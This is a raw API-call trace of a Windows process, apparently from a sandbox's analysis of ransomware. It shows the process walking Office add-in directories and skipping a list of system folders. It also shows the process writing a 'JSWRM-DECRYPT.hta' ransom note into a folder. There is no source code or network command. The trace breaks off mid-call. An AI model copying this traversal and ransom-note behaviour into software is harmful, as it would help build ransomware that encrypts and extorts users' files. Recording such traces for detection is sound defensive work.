[0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.144] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4995f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.144] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.145] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="hr", cAlternateFileName="")) returned 1 [0123.145] lstrcmpiW (lpString1="hr", lpString2=".") returned 1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="..") returned 1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="...") returned 1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="windows") returned -1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="recovery") returned -1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="perflogs") returned -1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="documents and settings") returned 1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="$RECYCLE.BIN") returned 1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="system volume information") returned -1 [0123.145] lstrcmpiW (lpString1="hr", lpString2="msocache") returned -1 [0123.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hr\\jswrm-decrypt.hta")) returned 0xffffffff [0123.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.147] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.147] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.148] CloseHandle (hObject=0x338) returned 1 [0123.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hr\\jswrm-decrypt.hta")) returned 0x20 [0123.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.148] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hr\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40101f23, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0123.148] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.148] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40101f23, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.148] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.148] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.148] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40101f23, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40101f23, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40101f23, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.148] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.148] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.149] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.149] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.150] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a13a8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.150] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0123.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.151] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.151] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.151] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17ef5ba, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17ef5ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.151] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.152] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.152] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.152] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.152] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.152] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.152] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 